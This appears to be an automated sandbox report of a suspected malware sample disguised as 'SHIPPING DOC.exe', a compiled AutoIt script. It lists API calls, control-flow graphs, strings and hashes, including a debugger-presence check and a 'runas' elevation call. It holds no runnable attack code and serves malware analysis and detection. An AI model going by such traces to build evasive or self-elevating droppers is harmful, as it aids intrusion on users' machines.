                                                                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\SHIPPING DOC.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                      • String ID: C:\Users\user\Desktop\SHIPPING DOC.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                      • API String ID: 2495805114-561926675
                                                                                                                      • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                      • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1921 427693-427696 1915->1921 1922 427688-427691 1915->1922 1920 4276b4-4276be 1916->1920 1923 427625-427629 1917->1923 1924 40e59c-40e59f 1917->1924 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1920->1937 1921->1920 1925 427698-4276a8 1921->1925 1922->1920 1927 427636-427640 1923->1927 1928 42762b-427631 1923->1928 1929 40e5a5-40e5ae 1924->1929 1930 427654-427657 1924->1930 1933 4276b0 1925->1933 1934 4276aa-4276ae 1925->1934 1927->1918 1928->1918 1931 40e5b4 1929->1931 1932 427645-42764f 1929->1932 1930->1918 1938 42765d-42766f 1930->1938 1931->1918 1932->1918 1933->1920 1934->1920 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1947 40e5e8 1936->1947 1937->1941 1938->1918 1940->1937 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                      • String ID: 0SH
                                                                                                                      • API String ID: 3363477735-851180471
                                                                                                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: IsThemeActive$uxtheme.dll
                                                                                                                      • API String ID: 2574300362-3542929980
                                                                                                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                      • API String ID: 1762048999-758534266
                                                                                                                      • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                      • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SHIPPING DOC.exe,00000104,?), ref: 00401F4C
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                      • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                      • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                      • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                      • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SHIPPING DOC.exe,00000104), ref: 00428B5B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\SHIPPING DOC.exe$CMDLINE$CMDLINERAW
                                                                                                                      • API String ID: 3948761352-217670280
                                                                                                                      • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                      • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                      • String ID: D)E$D)E$FILE
                                                                                                                      • API String ID: 3888824918-361185794
                                                                                                                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                      • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                      • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                      • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                      • _wcscat.LIBCMT ref: 00427541
                                                                                                                      • _wcslen.LIBCMT ref: 00427551
                                                                                                                      • _wcslen.LIBCMT ref: 00427562
                                                                                                                      • _wcscat.LIBCMT ref: 0042757C
                                                                                                                      • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                      • String ID: Include$\
                                                                                                                      • API String ID: 3173733714-3429789819
                                                                                                                      • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                                                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                      • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                                                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • _fseek.LIBCMT ref: 0045292B
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                      • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                      • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                      • _fseek.LIBCMT ref: 004529BF
                                                                                                                      • _malloc.LIBCMT ref: 004529CA
                                                                                                                      • _malloc.LIBCMT ref: 004529D6
                                                                                                                      • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                      • _free.LIBCMT ref: 00452A17
                                                                                                                      • _free.LIBCMT ref: 00452A20
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1255752989-0
                                                                                                                      • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                      • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(00A2E5A0,000000FF,00000000), ref: 00410552
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A2E5A0,000000FF,00000000), ref: 00410552
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
